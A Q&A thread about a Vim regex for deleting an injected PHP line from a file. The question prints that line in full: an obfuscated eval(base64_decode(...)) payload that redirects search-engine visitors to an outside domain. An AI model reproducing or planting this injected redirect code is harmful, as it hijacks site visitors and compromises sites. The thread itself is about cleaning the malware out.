# What's wrong with my VIM regex to search and replace some code?

Tags: regex, vim

I have the following bit of code in a php file.

```
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9ydW56b3IuZG5zcmQuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));
```

I opened up VIM and tried running a `0,$s/eval(.+;//gc` to try to remove all instances of it, but VIM says pattern not found.  What is the correct expression?

Notes - as per my comments I also tried `0,$s/eval\(.+;//gc` and VIM complained `E54: Unmatched \( E476: Invalid command`

I also tried `0,$s/eval\(.\+;//gc` and again got `E54: Unmatched \( E476: Invalid command`

Comment: I also tried `0,$s/eval\(.+;//gc` and VIM complained `E54: Unmatched \(
E476: Invalid command`

Comment: Vim regex requires you to escape the `+` for it to be used as a metacharacter rather than the literal.  Escape it with `\+`

Comment: `%s/eval(.*//gc` This seems to work for me. Or it should be `1, $s` as @DanteisnotaGeek said.

Comment: @Cthulhu your answer also worked

Answer (score 8, accepted):

In Vim, unlike most anywhere else, some of the meta-characters must be escaped to be used as metacharacters, rather than escaped as literals. Therefore, you need to escape `+` as `\+` to match *one or more of the preceding*.

```
0,$s/eval(.\+;//gc
```

The above is tested and working with your PHP snippet.

*Edit: Sorry -  previous version had a mistaken `\(` where `(` should be unescaped as a literal.*

Comment: @Cthulhu I meant to unescape the `(`  - sorry